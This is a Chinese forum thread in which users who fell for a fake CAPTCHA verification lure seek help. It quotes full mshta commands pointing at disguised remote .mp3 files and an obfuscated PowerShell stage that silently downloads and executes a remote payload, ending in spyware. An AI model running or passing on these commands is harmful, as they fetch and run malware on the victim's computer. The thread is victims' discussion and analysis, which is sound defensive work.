火绒没找到，现在让卡巴斯基扫一晚上，明天不知道结果如何

呼叫吧主

这个是尝试利用Microsoft HTML Application去执行一个.mp4的远程文件，这个疑似恶意代码。用卡巴斯基等杀毒软件进行全盘扫描，并且排除可疑进程看看

这个代码会下载间谍程序，目前已知卡巴斯基可以检测

麻烦提供一下网页连接，我进行分析一下哈

网站被墙了貌似（？

救命，我也遇到了，有弹出蓝色的poweshell，咋办啊现在？

我也遇到了相似的情况，不小心访问了https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/tozeyourslok/o/preload-verif-processing.html，
执行了mshta https://jackios.shop/surfinglo.mp3 # # Ⅰ ɑm ոօt ɑ ɾօbօt: ϹΑΡΤCHA Verіfіcаtіοո UID: 181902。
这个mp3文件看上去像是正常的音频文件，实际上里面夹带私货，有<script>标签，跟踪下来最后是用powershell执行了这个
iexStart-Process "$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ArgumentList '-NoProfile','-ExecutionPolicy','Unrestricted','-Command','SV ut ([Net.WebClient]::New());SI
Variable:3S (((([Net.WebClient]::New()|Get-Member)|?{(Get-ChildItem Variable:/_).Value.Name -clike ''*wn*g''}).Name));Set-Item Variable:\p ''https://h1.yyoiy.shop/750413b4e6897a671bc759e04597952a0be7478301
89873b.xlsm'';IEX (Get-Item Variable:/ut).Value.((Get-Item Variable:3S).Value)((Variable p -ValueOn))';$GdLKafMo = $env:AppData;function AKbE($MqPitd, $zYWMTrhxs){curl $MqPitd -o $zYWMTrhxs};function ZHMeh
(){function JUrNP($nbaVWwQd){if(!(Test-Path -Path $zYWMTrhxs)){AKbE $nbaVWwQd $zYWMTrhxs}}}ZHMeh;
这个xlsm文件有好几万行，而且混淆过，实在是看不懂了，希望有高手能帮忙分析一下它到底干了什么，有什么危害，非常感谢

xlsm文件实际是powershell脚本，一层一层拆开以后，实际执行了这个病毒exe文件：
https://www.virustotal.com/gui/file/01e9fc39f6ae53dd70a292daff68b77d76e0f36911d887b0d7e42f7aa1c1512b
我不会用IDA，懂逆向的可以看下。也不知道怎么干掉这个病毒，现在好像没有可疑进程，也没有可疑网络连接，360也扫不出来。

mshta https://kezming.shop/lingerhereplaying.mp3 # # Ⅰ ɑm ոօt ɑ ɾօbօt: ϹΑΡΤCHA Verіfіcаtіοո UID: 181902